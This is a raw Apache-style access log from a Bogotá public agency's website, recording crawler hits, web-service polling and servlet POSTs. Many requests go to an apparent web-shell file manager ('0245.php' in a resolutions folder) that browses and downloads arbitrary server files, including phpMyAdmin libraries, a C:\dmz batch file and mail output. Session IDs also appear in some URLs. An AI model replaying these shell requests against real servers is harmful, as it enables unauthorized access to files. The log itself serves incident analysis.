47.128.112.221 - - [20/Jun/2024:01:22:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150312-1433-152000.txt&ft=notepad&white=1 HTTP/1.1" 200 2964
216.245.221.92 - - [20/Jun/2024:01:23:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:23:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.76 - - [20/Jun/2024:01:23:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1837.pdf&ft=img&white=1 HTTP/1.1" 200 1179407
201.245.192.253 - - [20/Jun/2024:01:23:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:24:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.112.46 - - [20/Jun/2024:01:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750%5C&f=00000724.tif&ft=img&white=1 HTTP/1.1" 200 204844
66.249.66.37 - - [20/Jun/2024:01:24:25 -0500] "GET /bogota-se- HTTP/1.1" 404 1034
201.245.192.253 - - [20/Jun/2024:01:24:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:24:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.186 - - [20/Jun/2024:01:24:36 -0500] "GET /en-el-dia-internacional-de-la-concienciacion-sobre-el-ruido-bajale-el-volumen.html HTTP/1.1" 200 980
207.46.13.102 - - [20/Jun/2024:01:25:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3579.pdf HTTP/1.1" 200 456302
172.22.2.4 - - [20/Jun/2024:01:23:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
47.128.17.54 - - [20/Jun/2024:01:25:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_6.flv&ft=img&white=1 HTTP/1.1" 200 23052047
201.245.192.253 - - [20/Jun/2024:01:25:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:25:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.20.80 - - [20/Jun/2024:01:25:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2147.pdf&ft=notepad&white=1 HTTP/1.1" 200 392905
201.245.192.253 - - [20/Jun/2024:01:26:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:26:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.126 - - [20/Jun/2024:01:26:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=language_stats.inc.php&ft=img&white=1 HTTP/1.1" 200 1380
207.46.13.102 - - [20/Jun/2024:01:26:48 -0500] "GET /Publicaciones/2024EE107995.pdf HTTP/1.1" 404 228
172.22.2.4 - - [20/Jun/2024:01:25:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
188.166.107.136 - - [20/Jun/2024:01:27:09 -0500] "GET / HTTP/1.1" 200 319
47.128.36.130 - - [20/Jun/2024:01:27:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5331.pdf&ft=img&white=1 HTTP/1.1" 200 347919
201.245.192.253 - - [20/Jun/2024:01:27:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:27:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33232
201.245.192.253 - - [20/Jun/2024:01:27:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34819
201.245.192.253 - - [20/Jun/2024:01:27:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:01:26:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.36.42 - - [20/Jun/2024:01:28:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=php.php&ft=img&white=1 HTTP/1.1" 200 37
201.245.192.253 - - [20/Jun/2024:01:28:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:28:27 -0500] "HEAD / HTTP/1.1" 200 -
162.55.37.148 - - [20/Jun/2024:01:28:28 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [20/Jun/2024:01:28:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.95 - - [20/Jun/2024:01:28:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1888.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:01:29:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:01:29:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.12 - - [20/Jun/2024:01:29:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0069.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:01:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33565
201.245.192.253 - - [20/Jun/2024:01:29:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.111.55 - - [20/Jun/2024:01:30:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0855.pdf&ft=notepad&white=1 HTTP/1.1" 200 327369
201.245.192.253 - - [20/Jun/2024:01:30:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:30:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:30:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34819
47.128.121.62 - - [20/Jun/2024:01:31:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4596.pdf&ft=notepad&white=1 HTTP/1.1" 200 405193
114.119.132.101 - - [20/Jun/2024:01:31:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2010/&sort=size&order=asc HTTP/1.1" 200 14312
201.245.192.253 - - [20/Jun/2024:01:31:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:31:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.117.149 - - [20/Jun/2024:01:31:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2135.pdf&ft=img&white=1 HTTP/1.1" 200 360207
201.245.192.253 - - [20/Jun/2024:01:32:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:32:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.65 - - [20/Jun/2024:01:32:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4092.pdf&ft=notepad&white=1 HTTP/1.1" 200 442057
172.22.2.4 - - [20/Jun/2024:01:31:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.124.86 - - [20/Jun/2024:01:33:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000207.tif&ft=notepad HTTP/1.1" 200 39888
216.245.221.92 - - [20/Jun/2024:01:33:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:33:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:01:32:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:01:33:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:34:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.37.79 - - [20/Jun/2024:01:34:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+501-550%5C&f=00000520.tif&white=1 HTTP/1.1" 200 117466
201.245.192.253 - - [20/Jun/2024:01:34:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:34:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.83 - - [20/Jun/2024:01:34:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6744.pdf&ft=notepad&white=1 HTTP/1.1" 200 1281506
201.245.192.253 - - [20/Jun/2024:01:35:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [20/Jun/2024:01:35:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.21.64 - - [20/Jun/2024:01:35:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2514.pdf&ft=img&white=1 HTTP/1.1" 200 102443
201.245.192.253 - - [20/Jun/2024:01:35:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.62.55 - - [20/Jun/2024:01:36:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2085.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:01:36:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:36:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.22.194 - - [20/Jun/2024:01:37:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1210.pdf&ft=img&white=1 HTTP/1.1" 200 392975
201.245.192.253 - - [20/Jun/2024:01:37:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.16 - - [20/Jun/2024:01:37:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1528.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:01:37:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:38:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:38:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:38:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.24.31 - - [20/Jun/2024:01:38:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4224.pdf&ft=notepad&white=1 HTTP/1.1" 200 294601
201.245.192.253 - - [20/Jun/2024:01:37:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [20/Jun/2024:01:38:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34819
172.22.2.4 - - [20/Jun/2024:01:37:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:39:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
167.71.128.135 - - [20/Jun/2024:01:39:01 -0500] "\x16\x03\x01\x01\xfd\x01" 400 226
47.128.20.192 - - [20/Jun/2024:01:39:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4892.pdf&ft=img&white=1 HTTP/1.1" 200 364303
201.245.192.253 - - [20/Jun/2024:01:39:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:01:37:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:01:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33565
201.245.192.253 - - [20/Jun/2024:01:39:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.34.202 - - [20/Jun/2024:01:40:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5012.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:01:40:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:40:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.186 - - [20/Jun/2024:01:40:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4583.pdf&ft=notepad&white=1 HTTP/1.1" 200 376521
201.245.192.253 - - [20/Jun/2024:01:41:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.41.132 - - [20/Jun/2024:01:41:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3950.pdf&ft=notepad&white=1 HTTP/1.1" 200 409289
201.245.192.253 - - [20/Jun/2024:01:40:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 31322
201.245.192.253 - - [20/Jun/2024:01:41:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.33.191 - - [20/Jun/2024:01:42:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1626.pdf&ft=notepad&white=1 HTTP/1.1" 200 327369
66.249.66.164 - - [20/Jun/2024:01:42:20 -0500] "GET /robots.txt HTTP/1.1" 404 1043
66.249.66.164 - - [20/Jun/2024:01:42:20 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
149.19.169.163 - - [20/Jun/2024:01:42:20 -0500] "-" 408 -
201.245.192.253 - - [20/Jun/2024:01:42:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:42:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
152.61.128.50 - - [20/Jun/2024:01:42:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [20/Jun/2024:01:42:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [20/Jun/2024:01:42:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
47.128.99.208 - - [20/Jun/2024:01:42:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002453.tif&ft=download HTTP/1.1" 200 249507
216.245.221.92 - - [20/Jun/2024:01:43:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:43:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.160 - - [20/Jun/2024:01:43:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages&f=spinner-2x.gif&ft=download HTTP/1.1" 200 8536
201.245.192.253 - - [20/Jun/2024:01:43:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:43:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:01:44:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.36.252 - - [20/Jun/2024:01:44:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5C&f=mercury_stop.bat&ft=img&white=1 HTTP/1.1" 200 60
201.245.192.253 - - [20/Jun/2024:01:44:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:01:42:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
74.82.47.3 - - [20/Jun/2024:01:44:50 -0500] "GET / HTTP/1.1" 200 319
47.128.112.17 - - [20/Jun/2024:01:45:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0333.pdf&ft=notepad&white=1 HTTP/1.1" 200 454345
172.22.2.4 - - [20/Jun/2024:01:43:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [20/Jun/2024:01:45:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:45:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.96.38 - - [20/Jun/2024:01:45:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=Thumbs.db&ft=img&white=1 HTTP/1.1" 200 215552
201.245.192.253 - - [20/Jun/2024:01:46:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:46:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.71 - - [20/Jun/2024:01:46:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750%5C&f=00000740.tif&ft=notepad&white=1 HTTP/1.1" 200 20165
66.249.66.37 - - [20/Jun/2024:01:46:55 -0500] "GET /distrito-firma-acuerdos-de-conservacion-con-academia-y-sociedad-civil-para-proteger-22-hectareas-en-suba-y-cerros-orientales.html HTTP/1.1" 200 1062
47.128.21.95 - - [20/Jun/2024:01:47:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0185.pdf&ft=notepad&white=1 HTTP/1.1" 200 646857
201.245.192.253 - - [20/Jun/2024:01:47:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
74.82.47.3 - - [20/Jun/2024:01:47:42 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [20/Jun/2024:01:47:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.29.154 - - [20/Jun/2024:01:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0144.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:01:48:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:48:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:48:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
74.82.47.3 - - [20/Jun/2024:01:48:31 -0500] "GET /geoserver/web/ HTTP/1.1" 200 2423
47.128.98.176 - - [20/Jun/2024:01:48:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4270.pdf&ft=notepad&white=1 HTTP/1.1" 200 1564361
201.245.192.253 - - [20/Jun/2024:01:48:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [20/Jun/2024:01:49:15 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Jun/2024:01:49:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.206 - - [20/Jun/2024:01:49:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3690.pdf&ft=img&white=1 HTTP/1.1" 200 380687
201.245.192.253 - - [20/Jun/2024:01:49:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.41.131 - - [20/Jun/2024:01:50:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1214.pdf&ft=notepad&white=1 HTTP/1.1" 200 532169
172.22.2.4 - - [20/Jun/2024:01:48:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:50:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:50:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.126.0 - - [20/Jun/2024:01:51:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion%5C&f=presentacion1.php&ft=img&white=1 HTTP/1.1" 200 508
172.22.2.4 - - [20/Jun/2024:01:49:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [20/Jun/2024:01:51:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.167 - - [20/Jun/2024:01:51:34 -0500] "GET /Publicaciones/2024EE92591.pdf HTTP/1.1" 404 227
